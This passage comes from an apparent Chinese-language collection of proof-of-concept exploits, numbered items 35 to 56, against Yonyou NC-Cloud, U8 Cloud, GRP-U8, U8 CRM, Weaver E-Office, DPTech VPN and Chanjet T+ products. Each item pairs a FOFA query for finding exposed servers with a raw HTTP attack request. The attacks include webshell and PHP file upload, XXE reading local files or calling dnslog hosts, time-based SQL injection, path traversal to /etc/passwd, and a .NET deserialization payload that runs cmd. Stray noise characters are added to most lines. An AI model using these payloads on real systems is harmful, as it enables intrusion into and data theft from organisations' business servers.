FOFA:app="用友-NC-Cloud"4 p: U& t: U: @& x
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.11 p' p* g" }" M$ M4 x4 p
Host: 203.25.218.166:88889 h" }& \, t- z0 ?
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info7 E* H# A2 B) f8 O7 o
Accept-Encoding: gzip, deflate
' ?: e+ C: h) ~0 y7 ? u7 YAccept: */*
- M; C% c- T" S0 u) f" ~Connection: close* {$ O( C# J* m, E' z
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA4 n5 [! g, K1 L
Content-Length: 1908 l! C* P' ^- u2 q- i% I
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
1 j; v) y; t! n* J4 i& L( Y" `
7 T. u! o3 q4 f. [5 G3 d" r9 W--fd28cb44e829ed1c197ec3bc71748df0, v+ q& \3 L' E/ l' r& c- k
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"7 }9 R' P7 [9 D
6 @* ]5 N( E; Z) _3 H<%out.println(1111*1111);%>- ]; J1 H; K# ~' s/ }
--fd28cb44e829ed1c197ec3bc71748df0--; N8 M8 E. ?8 O# V8 t: R
9 L: h" @' g8 `6 Q, s1 B9 L8 w e! w$ t9 m" @ F# _" H, v
36. 用友NC-Cloud soapFormat XXE( H; ~/ H0 m* r0 G9 E
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
/ a5 ?0 J+ l* h9 [POST /uapws/soapFormat.ajax HTTP/1.1
+ S9 K5 Q& T1 p W1 ^% {$ ^; FHost: 192.168.40.130:89896 A5 Q' K- V6 x, U3 n1 C! T- m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0$ _- R$ K+ V% x% a4 e5 h, }
Content-Length: 2637 o$ [0 p9 |! `2 q S" |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 }# ]( h2 y& W% GAccept-Encoding: gzip, deflate
% f |- ~! z) u, UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 V/ ^# w+ O- t# A; k" B2 M. Y v
Connection: close
/ q! J8 V6 D* Q* t& X6 lContent-Type: application/x-www-form-urlencoded' g6 j/ S/ h* t# n. P
Upgrade-Insecure-Requests: 1. R5 l9 u* f- @! g' w4 |+ G
! f3 [. K& t" r% U
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
7 V5 j- t2 V- {1 D H W; ~: S
9 `+ {) z/ R- k/ f% s$ ?6 Y- I
5 W5 C2 w! ~6 f- o4 k& t' R37. 用友NC-Cloud IUpdateService XXE8 ~9 Z+ ?/ n" p; w+ f
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"# J7 m6 Q0 `) K( I
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
" z) k* f$ A7 H/ |Host: 192.168.40.130:8989
& K3 C0 U" l% \/ H, tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.365 }- H8 Q" }( s" h
Content-Length: 4212 p: S, N7 k/ B; ^( d& ]) p! @1 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
a/ W. R O/ E' m; }8 A& BAccept-Encoding: gzip, deflate' g: B2 C% u$ b8 t/ N+ Z
Accept-Language: zh-CN,zh;q=0.9% X& o5 L; T0 K# ]5 E
Connection: close6 }( R' @! b5 |2 r! Q# m. _
Content-Type: text/xml;charset=UTF-8) A; X A$ R# W& o+ L4 A+ i
SOAPAction: urn:getResult
5 H) G* W+ h* }8 MUpgrade-Insecure-Requests: 1. n- y+ Z+ D3 P$ k
' ?9 V( {7 x% N# H! C$ p- l/ b Y
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
6 K9 Q0 Z; W4 K+ [: w<soapenv:Header/> g. A. T' ]! a5 f: ]* K6 m9 M
<soapenv:Body>0 {0 W$ T, d! O+ s8 F1 m
<iup:getResult>6 a/ b% z& z. \
<!--type: string-->
( w- Z1 t, Y- R& M- a<iup:string><![CDATA[
: E& ]. K& ?' q<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
) {! A0 V# u+ F, `2 ]<xxx/>]]></iup:string>
: I9 p3 P `% c</iup:getResult>
! h! R& L+ _& c, t9 u3 M/ d</soapenv:Body>
; P* f `5 g4 {</soapenv:Envelope>
4 h# _: c& N q. a9 C
! G, K* Y% _9 @6 q3 w
' V" A" @, o$ }, A. m4 n7 ~! V$ V' ~1 J+ _4 Z, M5 N( t0 Z
38. 用友U8 Cloud smartweb2.RPC.d XXE }. |) R- I: y/ e
FOFA:app="用友-U8-Cloud"
; D8 k) @% C+ tPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1* @4 |- m. Y) W" J* i9 X
Host: 192.168.40.131:8088
( Z& P+ v" Z5 ]* HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25/ K# i8 Y! l: |1 B P+ U
Content-Length: 260
! ]3 G& l. U. t: s5 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
( G* e: M+ P6 \4 U$ t' J0 X" F+ D8 W+ YAccept-Encoding: gzip, deflate
/ ?0 t1 h I d; pAccept-Language: zh-CN,zh;q=0.9
3 r9 L( W2 _+ v( v' m! P5 E2 @Connection: close
4 J/ m W6 _7 e1 MContent-Type: application/x-www-form-urlencoded/ ~6 j. V( p2 W* ~; X: N( |
& h! D. H. X1 S" D( F% [__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>0 h/ X# x0 x3 o6 S9 H
+ k% [$ M) `. e2 x9 X& Y
! [' [4 w& Z; |2 I* [3 Y( j39. 用友U8 Cloud RegisterServlet SQL注入
7 `- p( X2 x3 U/ C; m/ |FOFA:title="u8c"
+ C8 z5 b. m6 E' c2 s% jPOST /servlet/RegisterServlet HTTP/1.1
; m7 o' p! ?. d% ZHost: 192.168.86.128:8089) }) L8 g q& g7 m- i, @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
0 w9 ~$ h' x) j; jConnection: close
+ b- v2 c& S; q0 @Content-Length: 85% d+ K/ \7 F A5 g9 G4 f
Accept: */*! ?/ V: c$ M" R7 o
Accept-Language: en9 T# G: d8 H0 _ u/ H+ a1 O# x
Content-Type: application/x-www-form-urlencoded
/ C% ~4 R5 m1 g D. c7 H, `; m" EX-Forwarded-For: 127.0.0.1
: k4 X% `/ K' r- w, t0 Q7 @) ?Accept-Encoding: gzip0 O- a0 d2 K4 @" f* I( z$ u A
: S$ e! B6 Y5 K3 j
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--6 m/ Y3 I2 R. Z5 d0 Z
( b% }2 {) K* D) K1 j3 Y
( y+ R. g: P0 {$ H" h( _40. 用友U8-Cloud XChangeServlet XXE# p( h7 g6 l/ Q3 L) [/ }* w
FOFA:app="用友-U8-Cloud"
( S6 L# K* T. P; r& f+ _: k* s6 \POST /service/XChangeServlet HTTP/1.1
' f, S1 u8 v8 R! [: R+ ]/ AHost: x.x.x.x
; I$ ~5 H% Q/ H* tUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.364 ?0 L& T5 s, S/ X6 Y
Content-Type: text/xml
& I0 J" P" r# [Connection: close3 ~) X$ u- d7 [' m9 e' h- Q
( }- O1 r: X5 G$ D. g<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>8 V- i' l4 Q8 z$ E, U: w
8 R- N, [! ]- {9 z* y1 b" J. i
5 A- c# }8 s) j1 b, F' N41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
0 }1 x% f& c& x; U2 `# `/ @/ b9 jFOFA:app="用友-U8-Cloud"
; e; p+ h9 p6 x" X6 uGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.11 [7 S" w0 d! \1 N% h$ `+ w0 t
Host:
& H! W; z( p1 g9 j" p) Y+ sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 d$ i, j5 N2 M7 z, V- M
Content-Type: application/json3 K. N4 U. M2 o9 R
Accept-Encoding: gzip
! I, y) `0 L7 y, GConnection: close$ [& M( D% V# o- i' x. E( H6 W, R
4 _1 a1 C2 i/ z4 k- f3 N* q: j, l3 y& R. |" T/ j) J* {/ ]" ?
42. 用友GRP-U8 SmartUpload01 文件上传' i. a0 Y3 L( n4 i/ K) m. G
FOFA:app="用友-GRP-U8"+ O( @) @" f# ^5 O3 t# s% A
POST /u8qx/SmartUpload01.jsp HTTP/1.1
; j! q* h- P( vHost: x.x.x.x' t9 q6 w$ {' F/ ~: R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt7 C) g0 ]2 C7 b) a* r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
; q4 f# s7 d, o7 b0 w% W2 l7 w. O" f) k g `4 S+ m
PAYLOAD
; C n% p" I, ~& [2 H8 J
0 j# b/ r! m7 c7 p$ a: {' n5 _# v0 A5 A9 ?5 l
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml+ ] K* p2 y3 ~( j1 G
9 C2 S8 ?, M8 l- Q: j" u/ l3 U43. 用友GRP-U8 userInfoWeb SQL注入致RCE7 p: v% K9 H1 ?$ \7 ~1 W$ S4 G, L6 @
FOFA:app="用友-GRP-U8"
1 q4 r; [% G6 g1 p( i; cPOST /services/userInfoWeb HTTP/1.1
8 w; I1 u. _6 S; B0 `' bHost: your-ip
2 t! t- c! |. C0 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.369 c! A2 e3 n4 x% \4 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% J3 P, X; [/ l" L' K0 z. O$ LAccept-Encoding: gzip, deflate& W' _* s8 A5 N/ M9 d' X* v2 M4 t
Accept-Language: zh-CN,zh;q=0.9
% J" }$ t8 D- i% m% N, XConnection: close
1 A+ a8 Z) a7 E( b1 _6 a/ OSOAPAction:2 ]4 m7 J/ Q) ?. v# O4 N
Content-Type: text/xml;charset=UTF-8: H6 x7 k8 M) W! p0 Y! f' [) H/ k
: S, L9 h( ]4 p! p! p% d x<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
9 B6 A+ l j* O2 c2 i <soapenv:Header/>3 p/ l: q* F$ g
<soapenv:Body>
( E; V, U! z7 t! c1 {4 V <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">/ J. M! l6 w4 H2 Q3 b. K
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
0 ]8 L, @/ z, f/ Y </ser:getUserNameById>
' G1 _ U$ [0 W, B# Y/ e q# A </soapenv:Body>
3 M& `4 v3 _" G+ |; G</soapenv:Envelope>
9 W0 V6 h' `" t. q
1 ^0 L4 B1 ]9 E# q4 }$ d6 |7 Z5 {: n
7 ` C {) c7 ^1 c5 y: Y44. 用友GRP-U8 bx_dj_check.jsp SQL注入
4 ~+ O$ z: ]% zFOFA:app="用友-GRP-U8"
X7 o: M. b2 Y0 v1 o' ?! F$ QGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1, ~1 f& d* b' \$ d8 e- Z6 v. G
Host: your-ip
; _7 q) B3 v: B% p3 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36$ f; y; a' W5 d+ |( v0 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ F1 Y' h- g7 I: ~
Accept-Encoding: gzip, deflate2 C3 }$ ?1 I8 g! x, w+ ^
Accept-Language: zh-CN,zh;q=0.98 ~9 {5 j% x9 W$ ^& ?4 i
Connection: close
7 Z* G' j, k2 l9 [1 o
! _1 X) K8 K7 z. C4 {& ~& ^' Y& J0 `5 _$ |
45. 用友GRP-U8 ufgovbank XXE
) @9 z5 H/ a6 K. p4 O% n4 FFOFA:app="用友-GRP-U8"# s0 H" [' N( |9 K* p+ R3 H
POST /ufgovbank HTTP/1.1
$ m% I; O9 b) i# G8 dHost: 192.168.40.130:222
- R# y1 K5 c% n) o" a9 W4 O! k2 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
% J: k& f/ F: `Connection: close
, v) Z! _" N2 W5 wContent-Length: 161+ d+ a8 G+ q: |" L" ~( m. Q, b) F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) e% n, y! C: S3 u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ _8 x" C8 v+ g! R
Content-Type: application/x-www-form-urlencoded
, m$ s' b1 `, ^6 l9 EAccept-Encoding: gzip; t1 @2 N. `7 L4 S; T
) ?7 b$ `! k8 A2 x& p9 W
reqData=<?xml version="1.0"?>" m. d. c, s# U1 j6 X! |
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest6 z' T5 t9 Y; V5 t
6 M( N2 F; A! @6 o' \# L8 o% \; [( e6 q2 L9 Q/ M$ D5 ]: q
46. 用友GRP-U8 sqcxIndex.jsp SQL注入( S; r, v# G% ]1 v7 K% i& K
FOFA:app="用友-GRP-U8"# y/ ?, m1 m2 g
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.10 c4 w8 w5 f' q& j) |: ^
Host: your-ip
& x2 T [0 t, V& MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" v. l( C. e, Y+ L' f" k# M% d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 ^. O) ~( `: A6 o T( j, c+ rAccept-Encoding: gzip, deflate: z6 h* t% z7 n$ P- y9 L2 t
Accept-Language: zh-CN,zh;q=0.9
% P8 g9 n9 n% L( ~& [5 O5 vConnection: close
# {$ i4 X9 V3 v# p" k
: z8 [( p$ ]3 R8 l9 {( ]2 o' a! g; U9 T6 E& h! v$ b. q
47. 用友GRP A++Cloud 政府财务云 任意文件读取 Y6 M- f" j# P
FOFA:body="/pf/portal/login/css/fonts/style.css"1 B: }1 N" |, `
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1; g2 A, u( B4 t" A& p5 ]
Host: x.x.x.x7 U1 f/ \/ M% k& n- L& Q+ m) O" D
Cache-Control: max-age=08 |9 t( x9 `; Y0 e# x3 D+ t) k: |
Upgrade-Insecure-Requests: 1; z: Q( F: D+ Z; w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
3 \" n$ t- d0 Y: a! \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! m& i7 b, R& n/ P' `& w3 [
Accept-Encoding: gzip, deflate, br( f( K( B" l/ [3 H3 ^4 ?
Accept-Language: zh-CN,zh;q=0.9
$ K, t' S: ]9 H* \; R% xIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT0 k0 N/ a C, x; P4 c) M/ `
Connection: close
, B2 `+ `* N( E; q# I$ c3 K6 i( }3 x! a# M( q# n+ C
! t& f- m5 @- ^- P
: i9 p2 h# Y: }' j7 N
48. 用友U8 CRM swfupload 任意文件上传& X7 z" K$ n4 x: o7 i- R V
FOFA:title="用友U8CRM"7 ?4 u$ j4 W# F. }. R6 y7 B
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
. W+ {3 e! j8 bHost: your-ip
1 @' q7 w& l# a; R' Z2 w- {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- }. b" N/ m5 W5 V/ f4 p& @$ X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ _0 i a# e/ Y" a5 Z( H1 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ u+ w* p, s7 b* z7 K6 U8 z& v
Accept-Encoding: gzip, deflate( V* q$ ]$ h! b8 X
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
: T' v0 b' t* u8 i& \------2695209672394068716424300668553 x6 Z7 L M9 y! r, j) j6 K
Content-Disposition: form-data; name="file"; filename="s.php"# m4 @, s, o' A+ o% N1 G
1231- G! Z" w0 U. n$ E* f2 {. J: F' g
Content-Type: application/octet-stream9 P2 g) U0 h) n
------269520967239406871642430066855; ]( |( N, ]8 X3 t
Content-Disposition: form-data; name="upload"
3 [" Y% v6 v' s' d+ ^- W+ iupload# D' s. `9 K h2 j3 ^3 \9 P
------269520967239406871642430066855--1 v' \9 H# V g. E* W! j. c* H! `! f
! K4 ~6 R3 B/ n4 g* \
; }3 y, J0 i# f" {& D' j49. 用友U8 CRM系统uploadfile.php接口任意文件上传: ~6 ~$ c+ G! z0 o
FOFA:body="用友U8CRM"" B6 g4 S2 r1 p6 ~1 i5 S! P
0 J j: O1 q% g- H0 B/ U
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
. ]- B; z7 O& c* {, O; oHost: x.x.x.x
2 u4 X0 f8 m `1 m% YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 g3 P1 F+ A' t- o( k& U9 w3 B7 mContent-Length: 329
- e8 V/ e& s9 t/ c7 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 G0 k7 B1 U# U: `6 i% E# i
Accept-Encoding: gzip, deflate6 U2 l( p0 q/ N( x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* F, H$ Y- g! U6 n) i
Connection: close
. Q- e5 T0 s+ R$ D9 H) FContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
. b8 y$ S; X$ o5 ?2 H7 Y2 Y2 S p5 C: Q( p/ c% k
-----------------------------vvv3wdayqv3yppdxvn3w
! B; [! ~9 v/ \ X8 E3 LContent-Disposition: form-data; name="file"; filename="%s.php "" e& H6 E( z2 Q4 X7 p4 {& C
Content-Type: application/octet-stream6 J/ }: V0 k8 I0 F w% W$ [& K
+ m( U5 O2 B# x7 |# x4 ]9 ]
wersqqmlumloqa1 T, @: q6 c8 r& }
-----------------------------vvv3wdayqv3yppdxvn3w; s. K! r: _ S: Q6 D$ `! G, `0 @
Content-Disposition: form-data; name="upload"' K) l7 Z8 P }3 s% T4 @4 r. N0 `
2 D8 H: b, k3 ~- f y/ Supload) o5 N0 Z* K# E* h* y
-----------------------------vvv3wdayqv3yppdxvn3w--
: H& n& H) d) }# }. r
" `5 Q) ?- V! s; Z. z4 M2 O+ b. I1 a/ A, D, ~: W5 r( g
http://x.x.x.x/tmpfile/updB3CB.tmp.php$ h' N% f7 `- K5 p7 E7 H+ t1 q
2 W, e5 ^/ y* d8 B' X
50. QDocs Smart School 6.4.1 filterRecords SQL注入
( N( w, K2 s* X: J/ lFOFA:body="close closebtnmodal"; Z6 X" x2 ?- ?& D0 t
POST /course/filterRecords/ HTTP/1.1
1 t" h C8 U* ]: oHost: x.x.x.x
_$ K' T% |* mUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
% Q# o6 C \$ _' b* `3 wConnection: close$ f6 e& ]% t- G
Content-Length: 224
; o' K5 _" {8 ?7 x$ yAccept: */*
6 d, B1 C8 M! J* `4 ?: ]0 wAccept-Language: en
0 b1 V. ` H: W7 f7 h( h' wContent-Type: application/x-www-form-urlencoded$ A) m$ c8 u. m
Accept-Encoding: gzip# V) n1 _% j* S% C7 M6 o+ Q* H
9 B6 k( R0 W3 h* Hsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
5 r. J/ V% I, C1 M9 b( b: [' H9 J4 h2 T
8 L3 a& ^% X, O( U1 a
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入- w) N5 h" T0 P: T# Z- | _; m
FOFA:app="云时空社会化商业ERP系统" x' S8 w6 s% a B
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1( f s7 Z# M- z. j6 n, Y; ?
Host: your-ip; b" h- T) j4 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.364 t# r( I7 {' |4 j2 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9$ `1 V: e% O, V7 p* f) ~- j
Accept-Encoding: gzip, deflate3 _* j$ T2 H0 |3 g/ r
Accept-Language: zh-CN,zh;q=0.9
! S& D* {2 F! H8 A: V$ MConnection: close
( t( C& [: K: j4 |3 g9 Q) n0 [4 q4 {
* k( V% m" M" G+ L0 O: l52. 泛微E-Office json_common.php sql注入; Q4 q# U7 p1 J2 b( H2 O& ?
FOFA:app="泛微-EOffice"
- p/ z4 k7 P. [+ ]$ B. j' M lPOST /building/json_common.php HTTP/1.1) d6 O$ u% w' B0 ~8 O
Host: 192.168.86.128:8097
* t% I8 v! h. `' }) F3 F" EUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36! f; u+ q3 {' R5 I7 Z
Connection: close, {6 c; }9 a- v" q
Content-Length: 87# u* t8 D% o( Z8 D
Accept: */*
; g9 J" W# E7 m$ x" X {Accept-Language: en- L: F5 l8 D' t: ?6 Q! `5 @* w$ q6 V
Content-Type: application/x-www-form-urlencoded
4 c+ c6 e% ^7 WAccept-Encoding: gzip2 M- x, J/ v8 ]& R
3 o. R+ H' c& l. O6 T: y
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
& {1 ^4 y2 w3 e& I; n; q' t
0 K/ U% p" Y. E7 m/ S9 R% s4 O4 |" d0 \
53. 迪普 DPTech VPN Service 任意文件上传
; W( L5 T( Q6 `0 A% R LFOFA:app="DPtech-SSLVPN"1 R$ O$ J' j; T: F' F# r
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
) d D+ U$ E" `/ f# P
- V- s9 s. t7 V1 w& a
9 P. [/ l0 U& K/ ]& J54. 畅捷通T+ getstorewarehousebystore 远程代码执行
6 n7 G5 V {6 r2 K9 n$ l) ~; KFOFA:app="畅捷通-TPlus"
! m4 T2 `- L6 N* J- ]" L0 | v# i第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
/ t2 O1 _+ M3 I2 |% x"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"8 J: K2 {: u0 m% @8 N
, n1 _7 D; F" N/ R3 L R. z
* i( ]$ B7 ^8 t- i
完整数据包
3 G& N( D* ]. V! }" ]" ?POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1* R2 N4 H* [# M+ D/ D
Host: x.x.x.x" j% S% g% r& H9 A
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" E% l: a7 J" C
Content-Length: 593
" I' d9 Q O1 h- g4 `: X; E- F, g+ b
{
& E/ y' J0 t+ ~" ^"storeID":{
4 @& ^) g( d; C' f9 _1 y "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
1 C1 B2 H/ A5 [ "MethodName":"Start",+ X) Y% f6 a, }6 {* M; o$ W% e% L
"ObjectInstance":{
8 ~' l+ N' P$ Q( O "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",! ~1 @, {# V* u# @2 A& Q, d% N \
"StartInfo":{
9 R, C' G; o2 W0 n. } "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" \1 e: R. q# G! P( h' Z "FileName":"cmd",
" F0 o9 \. ]2 R. I% Z# Y; k' S "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
. F4 @8 S( r/ g: W% |& Z- M }
! r1 h3 ~2 C& X, W; X; M }
- B- y8 d+ y9 [9 e5 l5 p }
0 j" j8 ?% }7 B$ {6 F2 Z}. ?% h: c6 R* q6 Y) N, x
0 @: U5 E( H# J/ F7 U) K3 q' [$ b; i" J* ~) D& D d
第二步,访问如下url
1 N( _/ _1 P4 ]% S3 M/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
* n3 L; n+ \9 p* \& b7 o4 M: R' P0 \% j! A
% i" [+ C! m9 j% t3 R( F
55. 畅捷通T+ getdecallusers信息泄露+ ~7 I# i: N; @/ V
FOFA:app="畅捷通-TPlus"$ {5 Q( M5 `7 K1 U
第一步,通过1 i4 T6 |* V7 x( J
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie, ^1 w! K5 R6 ?
第二步,利用获取到的Cookie请求
2 u/ W4 x9 T2 a$ R5 \5 d4 S/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
7 V( B9 ] J! I3 K' H* S8 k- h* _$ y4 B9 j
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE, i2 N9 Y/ W: I2 p7 m- ?1 s
FOFA: app="畅捷通-TPlus"
7 _# v" ]: b# M3 h$ |' K/ q4 _: _2 vPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
) f+ u7 i. o/ _/ d; Q* DHost: x.x.x.x& }( q0 E. h4 l; p- D& ^" a
